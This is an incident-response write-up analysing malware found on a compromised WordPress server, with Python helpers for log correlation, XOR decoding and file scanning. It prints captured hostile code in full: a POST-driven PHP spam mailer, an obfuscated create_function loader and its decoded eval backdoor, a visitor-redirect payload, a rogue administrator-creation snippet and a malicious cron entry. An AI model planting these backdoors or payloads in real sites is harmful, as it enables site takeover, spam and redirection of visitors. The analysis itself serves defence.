Analyzing the malware on a compromised host

Host environment

PHP Version 7.0.11
disable_functions exec,passthru,proc_open,shell_exec,system,popen,dl
crontabs-1.10-33.el6.noarch
Linux cross.dev 2.6.32-754.14.2.el6.x86_64 #1 SMP Tue May 14 19:35:42 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
CentOS release 6.6 (Final)
Server version: Apache/2.2.15 (Unix)
plesk version Product version: 12.0.18 Update #101

Malicious processes observed

apache 38715 0.3 0.2 1958144 69272 ? Ss 09:31 0:00 sid -DFOREGROUND
apache 45368 7.8 0.0 139672  8804  ? Ss 14:50 7:51 selix
apache 50910 0.3 0.0 138192  5480  ? Ss 16:26 0:00 selix

While they are still running, strace or lsof can be used to track what the malicious processes are doing:

strace -p pid
lsof -p pid

Using the creation (start) time of the malicious process (09:31), cross-check the access_log and access_ssl_log records.

A likely related record was found: GET //wp-content/themes/news-box-lite/httpd.pl

There were also many POST /wp-content/themes/news-box-lite/ocqwjyrrl.php requests (and a pile of POST /xmlrpc.php).
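The cross-check described above can be scripted. The following is an added example (not part of the original post) that parses Apache combined-format log lines, keeps requests for script files under wp-content within a window around the process start time, and counts them per method, path and client address. The log lines are constructed to resemble the requests seen on this host; the timestamps, client addresses and the +0800 timezone are assumptions.

```python
import re
from collections import Counter
from datetime import datetime, timedelta

# Constructed sample lines in Apache combined log format (not from the original post);
# the paths mirror the ones seen on the compromised host, addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Nov/2019:09:29:51 +0800] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Nov/2019:09:30:40 +0800] "GET //wp-content/themes/news-box-lite/httpd.pl HTTP/1.1" 200 17 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Nov/2019:09:31:02 +0800] "POST /wp-content/themes/news-box-lite/ocqwjyrrl.php HTTP/1.1" 200 7 "-" "python-requests/2.22"
198.51.100.7 - - [18/Nov/2019:09:31:09 +0800] "POST /wp-content/themes/news-box-lite/ocqwjyrrl.php HTTP/1.1" 200 7 "-" "python-requests/2.22"
192.0.2.44 - - [18/Nov/2019:09:32:15 +0800] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Nov/2019:14:49:58 +0800] "POST /wp-content/themes/news-box-lite/ocqwjyrrl.php HTTP/1.1" 200 7 "-" "python-requests/2.22"
"""

# client, ident, user, [timestamp], "METHOD path protocol", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Assumed process start time: the 09:31 seen in the ps output, on the host's local day
PROCESS_START = datetime.strptime("18/Nov/2019:09:31:00 +0800", TS_FMT)


def parse_line(line):
    """Return a dict for one log line, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["path"] = re.sub(r"/+", "/", rec["path"])  # normalise '//wp-content' to '/wp-content'
    return rec


def suspicious_requests(log_text, start, window):
    """Requests for script files under wp-content within [start - window, start + window]."""
    lo, hi = start - window, start + window
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or not (lo <= rec["ts"] <= hi):
            continue
        # themes and plugins should be served as static assets or included by WordPress,
        # direct requests for .php/.pl/.cgi files under wp-content are worth a look
        if re.search(r"^/wp-content/.*\.(php|pl|cgi)$", rec["path"]):
            hits.append(rec)
    return hits


def summarize(hits):
    """Count (method, path, client) triples so repeated POSTs to one file stand out."""
    return Counter((h["method"], h["path"], h["ip"]) for h in hits)


def correlate(log_text=SAMPLE_LOG, start=PROCESS_START, window_minutes=2):
    hits = suspicious_requests(log_text, start, timedelta(minutes=window_minutes))
    return hits, summarize(hits)


if __name__ == "__main__":
    hits, summary = correlate()
    for (method, path, ip), n in summary.most_common():
        print(f"{n:4d}  {method:5s} {path}  from {ip}")
```

With the real logs, widen the window once the first hit is found and look at everything the same client address did before it; on this host the xmlrpc.php POSTs just before the theme file requests are the kind of trail that shows how the theme directory was reached.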

Inside news-box-lite there are a bunch of randomly named PHP files, such as ocqwjyrrl.php.

Their contents are all the same:

<?php
// every argument to mail() is taken, base64-decoded, from the POST body:
// recipient, subject, message body and extra headers
$jewrqwbnlk = base64_decode($_POST['ylxqjqbcn']);
$xaouf = base64_decode($_POST['nrsf']);
$jwgpxlzblkepa = base64_decode($_POST['tdluhqtnmzr']);
$fcublsqtpae = base64_decode($_POST['qqifquaqdzvp']);
$jfnbrsjfq = mail($jewrqwbnlk, $xaouf, $jwgpxlzblkepa , $fcublsqtpae);
// a fixed token tells the sender whether the mail was accepted
if($jfnbrsjfq){echo 'vwkxlpc';} else {echo 'yfbhn : ' . $jfnbrsjfq;}

In other words, they all came in through WordPress (the files are owned by the apache uid or the site user's uid).

The malicious processes run as the apache user, but they are not the httpd binary, so they show up under randomly generated process names such as pid, sid or selix.

They make outbound connections to port 25 and port 53, possibly attacking SMTP or DNS, or sending spam.

A job was also scheduled in /var/spool/cron/apache: */10 * * * * perl /var/tmp/obNAwDiLPa >/dev/null 2>&1

/var/spool/cron/apache was owned apache:apache at the time; I changed it with chown root:root and chmod 400 and deleted the perl job, but it was still successfully changed back to apache:apache (and the job was scheduled again) (possibly some core component was compromised).

These steps (the cron job, the malicious apache processes) were probably produced by GET /wp-content/themes/news-box-lite/httpd.pl, but httpd.pl had already been deleted, so its content could not be determined.

One of the many malicious files:

<?php $ZrbHHby='::H1 E5UHT0=. -'; $ISrLPIE='YH-PT j3=:SIGOC'^$ZrbHHby; $PcifgM='0Vme,6;69TU9e+.S1G6ymAT>2W979sn=,5wLXAECa, ,.,iaTlO=Ks1U;cg0RdR:XCL=RblZS qeSzonq3RXKEPGF>O kyibDXJfmb=4I7xJBXJ9BVi=SJ5=+m-SYHPtWAAXWuhp-<;=SHXlfls:HboLM>M2JbtjQ=P.64SLg-BMpCe..7 bdmrO 9,RB6 =H-lX594UWY k2WOZeU6DWbvgQ0X;IEQHYO8JJkRA+456b.=:hmzaYTkH1M8Vtwid0B SJ69 36W9ZG;=pr< NMXmu0-N+xWwWsGA=sRMU2I-nE,1IlokZdWkuZ TvreROqb -Dpq0u5kHreUetqnUobQ+dzdpgNJ09,KrZY>a X-:;EjBD9K+ A3mxcqPJ 7aEAPbyqG=MlW8,VMwJ =5lw5 B  6 m>OY>fP6 8bjear0xHH CM< vPM7aku4mploq3hd8exm3zx4bqkEXAno'; $mFDvwn=$ISrLPIE('', 'Y0EDJCUUM=:W:NV:B3EQJ9;Lm3XCX,1PYAPeqa>IhJUR65QYNK=RR8+A,753U-IIiSTEJGZUP3OSRORHd.pksP;;6WwPVaZs:eH-7qB:TEIgaHuSP:<N.7RyJJS< AtRV MJK>kkE ,MptVUBqZMZM2E=1ockWZ0B8CYrArI,1 X<JH16YX8zAegxA7,>7>obQ:TBBck9R7lgFYU=VXwb>+U13R7w.TIJ2F6 hmT1 -+2NbzKSIX2+0LNH,ys:z.7HAGRT2E TUuWF.P>C+KGOxpST6O7=XX3XSSbRX.JaaT1;5RqIYaG-4E.Te1gyTFYPwOH.D8EmOOjF<1 2P,OPM4nuc1 61X,Hau1EYwrDCA:A ;+CIAfN<m6QLP6KV.NNUu,,GshfEiZ,F+BIJuK1BCQhFnPH0zIAJOCABYM2:NJI +WLT2HD ZKk16-A4m::.M7W72TB85U;T- yl=.L+cGreOUAW=EXCADAk02ClU,L7TQODQ0R23iREJi2A34ONXUWE7jtMQTL:JQwQqSo,YFzi1S=L5bGT0K2BzYjKR9FmBFTd-BVFOtEBQGWSqAQbRCGX3XQhJCSDVAn+BKM2-1E DIO6Be4X2GO WJTCU4+TVHlapBYQgFGe2NM:eS.AIT7PEA;LOWDJcfb4o5NILJZLZxMr-+H,eQDCx STCQk>5>94a3Fp1,=l27g6S6lqhUe'^$PcifgM); $mFDvwn();

Looking only at $mFDvwn = $ISrLPIE('', XXX); $mFDvwn(); how does this end up executing code? It looks like it merely echoes a string,
but it actually relies on the ^ operator to build create_function (https://www.php.net/manual/en/function.create-function.php) (the description of ^ is at https://www.php.net/manual/en/language.operators.bitwise.php).
Decoded at https://www.unphp.net/decode/5913a97d362273e62447aa6654ab3071/:

<?php
if (!function_exists('xor_data__mut')) {
    // XOR $data with a repeating $key (the same scheme the loader itself uses)
    function xor_data__mut($data, $key) {
        $out = '';
        for ($i = 0; $i < strlen($data); $i++) {
            $out .= ($data[$i] ^ $key[$i % strlen($key)]);
        }
        return ($out);
    }
}
$data = false;
$data_key = false;
// the last cookie name is used as the XOR key and its value as the payload
foreach ($_COOKIE as $key => $value) {
    $data_key = $key;
    $data = $value;
}
// fall back to the last GET/POST parameter if no cookie was sent
if (!$data) {
    foreach ($_REQUEST as $key => $value) {
        $data_key = $key;
        $data = $value;
    }
}
$data = @unserialize(xor_data__mut(base64_decode($data), $data_key));
// an md5 password check gates the eval()
if ($data && array_key_exists('key', $data) && (md5($data['key']) == 'cf94416b34fb053a2b893477766f739a') && array_key_exists('payload', $data)) {
    eval($data['payload']);
    exit(0);
}
// otherwise answer with a host fingerprint so the operator can confirm the backdoor is alive
echo (md5(md5($_SERVER["HTTP_HOST"])));
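To see how the XOR trick works, here is an added example (not the post's own code, nor anything from unphp.net) that evaluates the loader's string XOR assignments the way PHP does and flags any variable that decodes to a code-execution function and is then invoked as $var(...). It assumes the loader's style: single-quoted literals without escape sequences, and the ^ operator applied to literals or to variables already assigned above. The SAMPLE string keeps the loader's first two assignments and elides the long body literal.

```python
import re
from typing import Dict, Optional

# Constructed sample: the first two assignments of the loader quoted above, body literal elided
SAMPLE = ("<?php $ZrbHHby='::H1 E5UHT0=. -'; $ISrLPIE='YH-PT j3=:SIGOC'^$ZrbHHby; "
          "$mFDvwn=$ISrLPIE('', '<long literal omitted>'^$PcifgM); $mFDvwn();")


def xor_strings(a: str, b: str) -> str:
    """PHP's '^' on two strings: XOR byte by byte, truncated to the shorter operand."""
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))


# Assignments of the form  $v = 'lit';  $v = 'lit' ^ $w;  $v = $w ^ 'lit';  $v = 'lit' ^ 'lit';
# Only single-quoted literals without escapes are handled, which is what this loader uses.
_OPERAND = r"(?:'(?P<{p}lit>[^']*)'|\$(?P<{p}var>\w+))"
_ASSIGN = re.compile(
    r"\$(?P<name>\w+)\s*=\s*" + _OPERAND.format(p="l")
    + r"(?:\s*\^\s*" + _OPERAND.format(p="r") + r")?\s*;"
)


def _operand(m, p: str, env: Dict[str, str]) -> Optional[str]:
    """Value of the left ('l') or right ('r') operand, or None if it is an unresolved variable."""
    if m.group(p + "lit") is not None:
        return m.group(p + "lit")
    if m.group(p + "var") is not None:
        return env.get(m.group(p + "var"))
    return None


def resolve_xor_assignments(src: str) -> Dict[str, str]:
    """Walk the source top to bottom, evaluating literal and XOR assignments into plain strings."""
    env: Dict[str, str] = {}
    for m in _ASSIGN.finditer(src):
        left = _operand(m, "l", env)
        if left is None:
            continue
        if m.group("rlit") is None and m.group("rvar") is None:
            env[m.group("name")] = left          # plain literal assignment
        else:
            right = _operand(m, "r", env)
            if right is not None:
                env[m.group("name")] = xor_strings(left, right)
    return env


# Function names that turn a string into executable code (or a command) when called
CODE_EXEC = {"create_function", "eval", "assert", "system", "exec", "passthru",
             "shell_exec", "popen", "proc_open", "preg_replace"}


def dangerous_dynamic_calls(src: str) -> Dict[str, str]:
    """Variables that decode to a code-execution function and are then called as $var(...)."""
    env = resolve_xor_assignments(src)
    return {v: fn for v, fn in env.items()
            if fn in CODE_EXEC and re.search(r"\$" + re.escape(v) + r"\s*\(", src)}


if __name__ == "__main__":
    for var, fn in dangerous_dynamic_calls(SAMPLE).items():
        print(f"${var} decodes to {fn}() and is called dynamically")
```

The first layer is all that is needed to classify the file: once a variable resolves to create_function and is called, the long second operand is the function body and can be decoded the same way for a full read. Note that this pattern slips past the disable_functions list in the host environment above, which names the shell functions but not create_function or eval.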

A create_function example:

create_function('$name', 'echo "Hello ".$name');

is equivalent to:

function fname($name) {
    echo "Hello ".$name;
}

There is also a file wp-data.php containing some base64-encoded content; this is what it does:

1. Scans directories such as www, httpdocs or public_html
2. Modifies .htaccess:
m^r^<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

3. Redirects visitors elsewhere:
m^r^<?php error_reporting(0);function a_($c_=32){$c0="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";$c1=strlen($c0);$c2="";for($c3=0;$c3<$c_;$c3++){$c2.=$c0[rand(0,$c1-1)];}return$c2;}$c4=array("Chrome","Firefox","Edge","Opera","Android","Safari","Windows");foreach($c4 as$c5){if(stripos($_SERVER['HTTP_USER_AGENT'],$c5)!==false){if(!isset($_COOKIE["wp-authcookie-1"])&&!isset($_COOKIE["wp-settings-time-1"])){setcookie("wp-authcookie-1","1",time()+3600*24*2);header("L"."oc"."at"."io"."n: ht"."tp:"."//"."13"."4.2"."49."."11"."6.78"."/?"."ke"."y=".a_());}}};?>

4. Creates a WordPress user:
m^r^<?php $createuser = wp_create_user('wordcamp', 'z43218765z', 'wordcamp@wordpress.com'); $user_created = new WP_User($createuser); $user_created -> set_role('administrator'); ?>
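Each of the files quoted in this post (the POST-driven mailer, the XOR loader, the eval backdoor, and the redirect and admin-creation payloads above) leaves a recognisable pattern in its source. As an added example (not code from the post), the scanner below runs a few narrow regexes over a directory of PHP files and reports which patterns each file matches. The sample files it writes into a temporary directory are constructed to mirror the shapes of the quoted snippets; the placeholder password and redirect host are not the real values.

```python
import re
from pathlib import Path
from tempfile import TemporaryDirectory

# Regexes derived from the samples quoted in this post. Each is deliberately narrow so that
# a match is worth a manual look rather than a guess.
RULES = {
    # mail() fed from base64-decoded POST parameters: the spam relay in ocqwjyrrl.php
    "post_mailer": re.compile(r"base64_decode\(\$_POST\[.*?mail\(", re.S),
    # 'literal' ^ 'literal' or 'literal' ^ $var: XOR-assembled function names and bodies
    "string_xor": re.compile(r"'[^']*'\s*\^\s*(?:'[^']*'|\$\w+)"),
    # payload taken from a cookie or request parameter, unserialized, then eval()ed
    "eval_backdoor": re.compile(r"""eval\(\$\w+\[['"]payload['"]\]\)"""),
    # administrator account created from a theme or plugin file
    "rogue_admin": re.compile(r"""wp_create_user\(.*?set_role\(\s*['"]administrator['"]""", re.S),
    # header("L"."oc"."at"...): a Location header assembled from fragments to dodge grep
    "split_header": re.compile(r'header\(\s*"[A-Za-z]{1,3}"\s*\.\s*"'),
}


def scan_source(src: str):
    """Names of the rules that match one file's source, sorted for stable output."""
    return sorted(name for name, rx in RULES.items() if rx.search(src))


def scan_tree(root, suffixes=(".php", ".phtml", ".pl")):
    """Map of relative path -> matched rule names for every script file under root."""
    root = Path(root)
    findings = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix in suffixes:
            hits = scan_source(p.read_text(errors="replace"))
            if hits:
                findings[p.relative_to(root).as_posix()] = hits
    return findings


# Constructed files reproducing the shapes of the quoted samples (not the real files)
SAMPLE_FILES = {
    "theme/functions.php": "<?php add_action('init', 'theme_setup');",
    "theme/ocqwjyrrl.php": "<?php $t = base64_decode($_POST['a']); $s = base64_decode($_POST['b']);\n"
                           "$m = base64_decode($_POST['c']); $h = base64_decode($_POST['d']); mail($t, $s, $m, $h);",
    "theme/wp-data.php": r"""<?php $createuser = wp_create_user('wordcamp', 'PLACEHOLDER', 'wordcamp@wordpress.com');
$u = new WP_User($createuser); $u->set_role('administrator');
header("L"."oc"."at"."io"."n: ht"."tp:"."//"."redirect.invalid"."/?"."ke"."y=".a_());""",
    "loader.php": "<?php $k='::H1 E5UHT0=. -'; $f='YH-PT j3=:SIGOC'^$k; $g=$f('', 'body'^$k); $g();",
    "backdoor.php": "<?php $data = @unserialize(xor_data__mut(base64_decode($data), $data_key));\n"
                    "if ($data && md5($data['key']) == 'HASH') { eval($data['payload']); exit(0); }",
}


def demo_scan():
    """Write the constructed samples to a temporary directory and scan it."""
    with TemporaryDirectory() as tmp:
        for rel, body in SAMPLE_FILES.items():
            path = Path(tmp, rel)
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_text(body)
        return scan_tree(tmp)


if __name__ == "__main__":
    for rel, hits in sorted(demo_scan().items()):
        print(f"{rel}: {', '.join(hits)}")
```

Run scan_tree against the document root and compare any hit with a clean copy of the theme or plugin from its upstream source; a file that matches a rule, is owned by the apache user, and has a modification time close to the process start seen in ps is the one to pull for analysis first.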


Last modified: 18 November 2019
